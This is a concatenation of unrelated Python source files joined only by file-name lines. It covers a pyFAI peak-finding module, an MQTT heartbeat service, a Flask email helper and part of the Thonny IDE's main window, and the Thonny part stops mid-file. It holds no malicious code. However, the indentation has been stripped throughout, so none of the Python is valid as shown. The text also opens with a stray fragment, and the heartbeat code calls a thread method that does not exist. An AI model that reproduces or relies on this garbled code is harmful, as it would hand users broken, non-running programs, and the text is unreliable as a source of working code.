return cell_code
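# --- Usage sketch (illustration only, not part of the original module) ---
# ScriptInfo.get() returns a (ScriptInfoResult, ScriptRequirements) pair for the
# current script; a minimal, hedged example of inspecting the detected repository:
if __name__ == "__main__":
    result, requirements = ScriptInfo.get(create_requirements=False)
    if result.script:
        print("repository:", result.script.get("repository"))
        print("entry point:", result.script.get("entry_point"))
        print("working dir:", result.script.get("working_dir"))
    for message in result.warning_messages:
        print(message)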
|
massif.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Azimuthal integration
# https://github.com/silx-kit/pyFAI
#
# Copyright (C) 2014-2018 European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: Jérôme Kieffer (Jerome.Kieffer@ESRF.eu)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
__author__ = "Jérôme Kieffer"
__contact__ = "Jerome.Kieffer@ESRF.eu"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
__date__ = "22/03/2019"
__status__ = "production"
import sys
import os
import threading
from math import ceil, sqrt
import logging
logger = logging.getLogger(__name__)
import numpy
import fabio
from scipy.ndimage import label, distance_transform_edt
from scipy.ndimage.filters import median_filter
from .utils.decorators import deprecated
from .ext.bilinear import Bilinear
from .utils import gaussian_filter, binning, unbinning, is_far_from_group
from .third_party import six
if os.name != "nt":
WindowsError = RuntimeError
class Massif(object):
"""
A massif is defined as an area around a peak; it is used to find neighboring peaks.
"""
TARGET_SIZE = 1024
def __init__(self, data=None, mask=None):
"""Constructor of the class...
:param data: 2D array or filename (discouraged)
:param mask: array with non zero for invalid data
"""
if isinstance(data, six.string_types) and os.path.isfile(data):
self.data = fabio.open(data).data.astype("float32")
elif isinstance(data, fabio.fabioimage.fabioimage):
self.data = data.data.astype("float32")
else:
try:
self.data = data.astype("float32")
except Exception as error:
logger.error("Unable to understand this type of data %s: %s", data, error)
self.log_info = True
"""If true, more information is displayed in the logger relative to picking."""
self.mask = mask
self._cleaned_data = None
self._bilin = Bilinear(self.data)
self._blurred_data = None
self._median_data = None
self._labeled_massif = None
self._number_massif = None
self._valley_size = None
self._binned_data = None
self._reconstruct_used = None
self.binning = None # Binning is 2-list usually
self._sem = threading.Semaphore()
self._sem_label = threading.Semaphore()
self._sem_binning = threading.Semaphore()
self._sem_median = threading.Semaphore()
def nearest_peak(self, x):
"""
:param x: coordinates of the peak
:returns: the coordinates of the nearest peak
"""
out = self._bilin.local_maxi(x)
if isinstance(out, tuple):
res = out
elif isinstance(out, numpy.ndarray):
res = tuple(out)
else:
res = [int(i) for idx, i in enumerate(out) if 0 <= i < self.data.shape[idx]]
if (len(res) != 2) or not((0 <= out[0] < self.data.shape[0]) and (0 <= res[1] < self.data.shape[1])):
logger.warning("in nearest_peak %s -> %s", x, out)
return
elif (self.mask is not None) and self.mask[int(res[0]), int(res[1])]:
logger.info("Masked pixel %s -> %s", x, out)
return
else:
return res
def calculate_massif(self, x):
"""
defines a map of the massif around x and returns the mask
"""
labeled = self.get_labeled_massif()
if labeled[x[0], x[1]] > 0: # without relabeling, the background is labeled 0 (otherwise it would be labeled.max())
return (labeled == labeled[x[0], x[1]])
def find_peaks(self, x, nmax=200, annotate=None, massif_contour=None, stdout=sys.stdout):
"""
All in one function that finds a maximum from the given seed (x)
then calculates the region extension and extract position of the neighboring peaks.
:param Tuple[int] x: coordinates of the peak, seed for the calculation
:param int nmax: maximum number of peak per region
:param annotate: callback method taking number of points + coordinate as input.
:param massif_contour: callback to show the contour of a massif with the given index.
:param stdout: this is the file where output is written by default.
:return: list of peaks
"""
region = self.calculate_massif(x)
if region is None:
if self.log_info:
logger.error("You picked a background point at %s", x)
return []
xinit = self.nearest_peak(x)
if xinit is None:
if self.log_info:
logger.error("Unable to find peak in the vinicy of %s", x)
return []
else:
if not region[int(xinit[0] + 0.5), int(xinit[1] + 0.5)]:
logger.error("Nearest peak %s is not in the same region %s", xinit, x)
return []
if annotate is not None:
try:
annotate(xinit, x)
except Exception as error:
logger.debug("Backtrace", exc_info=True)
logger.error("Error in annotate %i: %i %i. %s", 0, xinit[0], xinit[1], error)
listpeaks = []
listpeaks.append(xinit)
cleaned_data = self.cleaned_data
mean = cleaned_data[region].mean(dtype=numpy.float64)
region2 = region * (cleaned_data > mean)
idx = numpy.vstack(numpy.where(region2)).T
numpy.random.shuffle(idx)
nmax = min(nmax, int(ceil(sqrt(idx.shape[0]))))
if massif_contour is not None:
try:
massif_contour(region)
except (WindowsError, MemoryError) as error:
logger.debug("Backtrace", exc_info=True)
logger.error("Error in plotting region: %s", error)
nbFailure = 0
for j in idx:
xopt = self.nearest_peak(j)
if xopt is None:
nbFailure += 1
continue
if (region2[int(xopt[0] + 0.5), int(xopt[1] + 0.5)]) and not (xopt in listpeaks):
if stdout:
stdout.write("[ %4i, %4i ] --> [ %5.1f, %5.1f ] after %3i iterations %s" % (tuple(j) + tuple(xopt) + (nbFailure, os.linesep)))
listpeaks.append(xopt)
nbFailure = 0
else:
nbFailure += 1
if (len(listpeaks) > nmax) or (nbFailure > 2 * nmax):
break
return listpeaks
def peaks_from_area(self, mask, Imin=numpy.finfo(numpy.float64).min,
keep=1000, dmin=0.0, seed=None, **kwarg):
"""
Return the list of peaks within an area
:param mask: 2d array with mask.
:param Imin: minimum of intensity above the background to keep the point
:param keep: maximum number of points to keep
:param kwarg: ignored parameters
:param dmin: minimum distance to another peak
:param seed: list of good guesses to start with
:return: list of peaks [y,x], [y,x], ...]
"""
all_points = numpy.vstack(numpy.where(mask)).T
res = []
cnt = 0
dmin2 = dmin * dmin
if len(all_points) > 0:
numpy.random.shuffle(all_points)
if seed:
seeds = numpy.array(list(seed))
if len(seeds) > 0:
numpy.random.shuffle(seeds)
all_points = numpy.concatenate((seeds, all_points))
for idx in all_points:
out = self.nearest_peak(idx)
if out is not None:
msg = "[ %3i, %3i ] -> [ %.1f, %.1f ]"
logger.debug(msg, idx[1], idx[0], out[1], out[0])
p0, p1 = int(round(out[0])), int(round(out[1]))
if mask[p0, p1]:
if (self.data[p0, p1] > Imin) and is_far_from_group(out, res, dmin2):
res.append(out)
cnt = 0
if len(res) >= keep or cnt > keep:
break
else:
cnt += 1
return res
def init_valley_size(self):
if self._valley_size is None:
self.valley_size = max(5., max(self.data.shape) / 50.)
@property
def valley_size(self):
"Defines the minimum distance between two massifs"
if self._valley_size is None:
self.init_valley_size()
return self._valley_size
@valley_size.setter
def valley_size(self, size):
new_size = float(size)
if self._valley_size != new_size:
self._valley_size = new_size
t = threading.Thread(target=self.get_labeled_massif)
t.start()
@valley_size.deleter
def valley_size(self):
self._valley_size = None
self._blurred_data = None
@property
def cleaned_data(self):
if self.mask is None:
return self.data
else:
if self._cleaned_data is None:
idx = distance_transform_edt(self.mask,
return_distances=False,
return_indices=True)
self._cleaned_data = self.data[tuple(idx)]
return self._cleaned_data
def get_binned_data(self):
"""
:return: binned data
"""
if self._binned_data is None:
with self._sem_binning:
if self._binned_data is None:
logger.info("Image size is %s", self.data.shape)
self.binning = []
for i in self.data.shape:
if i % self.TARGET_SIZE == 0:
self.binning.append(max(1, i // self.TARGET_SIZE))
else:
for j in range(i // self.TARGET_SIZE - 1, 0, -1):
if i % j == 0:
self.binning.append(max(1, j))
break
else:
self.binning.append(1)
# self.binning = max([max(1, i // self.TARGET_SIZE) for i in self.data.shape])
logger.info("Binning size is %s", self.binning)
self._binned_data = binning(self.cleaned_data, self.binning)
return self._binned_data
def get_median_data(self):
"""
:return: a spatial median filtered image 3x3
"""
if self._median_data is None:
with self._sem_median:
if self._median_data is None:
self._median_data = median_filter(self.cleaned_data, 3)
return self._median_data
def get_blurred_data(self):
"""
:return: a blurred image
"""
if self._blurred_data is None:
with self._sem:
if self._blurred_data is None:
logger.debug("Blurring image with kernel size: %s", self.valley_size)
self._blurred_data = gaussian_filter(self.get_binned_data(),
[self.valley_size / i for i in self.binning],
mode="reflect")
return self._blurred_data
def get_labeled_massif(self, pattern=None, reconstruct=True):
"""
:param pattern: 3x3 matrix
:param reconstruct: if False, split massif at masked position, else reconstruct missing part.
:return: an image composed of int with a different value for each massif
"""
if self._labeled_massif is None:
with self._sem_label:
if self._labeled_massif is None:
if pattern is None:
pattern = numpy.ones((3, 3), dtype=numpy.int8)
logger.debug("Labeling all massifs. This takes some time !!!")
massif_binarization = (self.get_binned_data() > self.get_blurred_data())
if (self.mask is not None) and (not reconstruct):
binned_mask = binning(self.mask.astype(int), self.binning, norm=False)
massif_binarization = numpy.logical_and(massif_binarization, binned_mask == 0)
self._reconstruct_used = reconstruct
labeled_massif, self._number_massif = label(massif_binarization,
pattern)
# TODO: investigate why relabel fails
# relabeled = relabel(labeled_massif, self.get_binned_data(), self.get_blurred_data())
relabeled = labeled_massif
self._labeled_massif = unbinning(relabeled, self.binning, False)
logger.info("Labeling found %s massifs.", self._number_massif)
return self._labeled_massif
@deprecated(reason="switch to pep8 style", replacement="init_valley_size", since_version="0.16.0")
def initValleySize(self):
self.init_valley_size()
@deprecated(reason="switch to PEP8 style", replacement="get_median_data", since_version="0.16.0")
def getMedianData(self):
return self.get_median_data()
@deprecated(reason="switch to PEP8 style", replacement="get_binned_data", since_version="0.16.0")
def getBinnedData(self):
return self.get_binned_data()
@deprecated(reason="switch to PEP8 style", replacement="get_blurred_data", since_version="0.16.0")
def getBluredData(self):
return self.get_blurred_data()
@deprecated(reason="switch to PEP8 style", replacement="get_labeled_massif", since_version="0.16.0")
def getLabeledMassif(self, pattern=None):
return self.get_labeled_massif(pattern)
|
service.py
|
"""[Docstring] Declares functions, running the heartbeat."""
from threading import Thread
from time import sleep
from paho.mqtt.client import Client, MQTTv311
class Service:
"""[Docstring] Static class, holding and managing the microservice's heartbeat thread."""
heartbeatThread: Thread
heartbeatCount: int
heartbeatActive: bool = False
@staticmethod
def initiateHeartbeat(interval: float, count: int, brokerAddress: str, brokerPort: int, brokerUsername: str, brokerPassword: str, brokerChannel: str) -> bool:
"""[Docstring] Declares functions, initiating new heartbeat with respective values."""
Service.heartbeatThread = Thread(target=Service.publishHeartbeat, args=(interval, count, brokerAddress, brokerPort, brokerUsername, brokerPassword, brokerChannel, ))
Service.heartbeatThread.daemon = True # works ONLY for generic thread class
Service.heartbeatThread.start()
return Service.heartbeatThread.is_alive()
@staticmethod
def stopHeartbeat() -> bool:
"""[Docstring] Declares functions, stopping currently running heartbeats."""
Service.heartbeatThread.stop()
return not Service.heartbeatThread.is_alive()
@staticmethod
def monitorHeartbeat() -> int:
"""[Docstring] Fetches the current heartbeat count."""
return Service.heartbeatCount
@staticmethod
def publishHeartbeat(interval: float, count: int, brokerAddress: str, brokerPort: int, brokerUsername: str, brokerPassword: str, brokerChannel: str):
"""[Docstring] Function handling lifetime of a heartbeat."""
try:
Service.heartbeatCount = count
client = Client(client_id="heartbeatPublisher",
clean_session=False,
userdata=None,
protocol=MQTTv311,
transport="tcp")
client.username_pw_set(brokerUsername, brokerPassword)
client.connect(brokerAddress, brokerPort, 60)
while Service.heartbeatActive and Service.heartbeatCount >= 0:
Service.heartbeatCount += 1
payload: bytes = Service.heartbeatCount.to_bytes(8, "big")
client.publish(brokerChannel, payload=payload, qos=0, retain=False, properties=None)
sleep(interval)
except Exception as error:
raise Exception("EXPECTATION FAILED") from error
|
mail.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from app import mail
def _send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(subject=subject, recipients=[to])
msg.html = render_template('mails/' + template, **kwargs)
thr = Thread(target=_send_async_email, args=[app, msg])
thr.start()
return thr
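# Hedged usage sketch (not part of the original module): the recipient and template name
# are hypothetical, and send_email must run inside a Flask application/request context so
# that current_app and render_template resolve.
#
#     thr = send_email("user@example.com", "Welcome!", "welcome.html", name="Alice")
#     thr.join()  # optional: block until the background delivery attempt finishes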
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import os.path
import pkgutil
import platform
import queue
import re
import shutil
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
import webbrowser
from logging import getLogger
from threading import Thread
from tkinter import messagebox, ttk
from typing import Any, Callable, Dict, List, Optional, Sequence, Set, Tuple, Type, Union, cast
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
assistance,
get_runner,
get_shell,
is_portable,
languages,
ui_utils,
)
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.editors import EditorNotebook, is_local_path
from thonny.languages import tr
from thonny.misc_utils import (
copy_to_clipboard,
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
caps_lock_is_on,
create_action_label,
create_tooltip,
ems_to_pixels,
get_hyperlink_cursor,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
shift_is_pressed,
)
logger = getLogger(__name__)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
"thonnycontrib.rpi_pico",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self.ready = False
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._tweak_environment()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
ui_utils.add_messagebox_parent_checker()
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specifying default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._init_theming()
self._init_window()
self.option_add("*Dialog.msg.wrapLength", "8i")
self.add_view(
ShellView, tr("Shell"), "s", visible_by_default=True, default_position_key="A"
)
assistance.init()
self._runner = Runner()
self._init_hooks() # Plugins may register hooks, so initialize them before loading plugins.
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
self._init_regular_mode_link() # TODO:
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("EditorCodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("EditorCodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("EditorCodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self._update_toolbar, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self.bind("BackendRestart", self._on_backend_restart, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
"""
for name in sorted(sys.modules):
if (
not name.startswith("_")
and not name.startswith("thonny")
and not name.startswith("tkinter")
):
print(name)
"""
self.after(1, self._start_runner) # Show the UI right away, before waiting for the backend to start
self.after_idle(self.advertise_ready)
def advertise_ready(self):
self.ready = True
self.event_generate("WorkbenchReady")
self._editor_notebook.update_appearance()
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
master=self,
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget], int]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("general.environment", [])
self.set_default("general.large_icon_rowheight_threshold", 32)
self.set_default("file.avoid_zenity", False)
self.set_default("run.working_directory", os.path.expanduser("~"))
self.update_debug_mode()
def _tweak_environment(self):
for entry in self.get_option("general.environment"):
if "=" in entry:
key, val = entry.split("=", maxsplit=1)
os.environ[key] = os.path.expandvars(val)
else:
logger.warning("No '=' in environment entry '%s'", entry)
def update_debug_mode(self):
os.environ["THONNY_DEBUG"] = str(self.get_option("general.debug_mode", False))
thonny.set_logging_level()
def _init_language(self) -> None:
"""Initialize language."""
languages.set_language(self.get_option("general.language"))
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 50)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", tr("File"))
self.get_menu("edit", tr("Edit"))
self.get_menu("view", tr("View"))
self.get_menu("run", tr("Run"))
self.get_menu("tools", tr("Tools"))
self.get_menu("help", tr("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.__path__, "thonny.plugins.") # type: ignore
# 3rd party plugins from namespace package
# Now it's time to add plugins dir to sys path
sys.path.append(thonny.get_sys_path_directory_containg_plugins())
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logger.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logger.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(
thonny.get_ipc_file_path()
):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logger.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logger.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception as e:
logger.exception("Error in ipc server loop", exc_info=e)
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.get_ipc_file_path(), "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.get_ipc_file_path())
secret = ""
os.chmod(thonny.get_ipc_file_path(), 0o600)
return server_socket, secret
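# Hedged illustration (not part of the original file): this is not Thonny's actual
# delegation code, just the client side of the protocol implied by server_loop above
# (shown for the Windows/AF_INET case; on other systems an AF_UNIX socket is used and
# the secret is empty):
#
#     with open(thonny.get_ipc_file_path()) as fp:
#         port, secret = int(fp.readline()), fp.readline().strip()
#     sock = socket.create_connection(("127.0.0.1", port))
#     sock.sendall(repr((secret, sys.argv[1:])).encode("utf-8"))
#     sock.shutdown(socket.SHUT_WR)           # server reads until EOF before replying
#     assert sock.recv(1024).decode("utf-8") == SERVER_SUCCESS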
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
tr("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", tr("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
tr("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
tr("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
tr("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
tr("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
tr("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
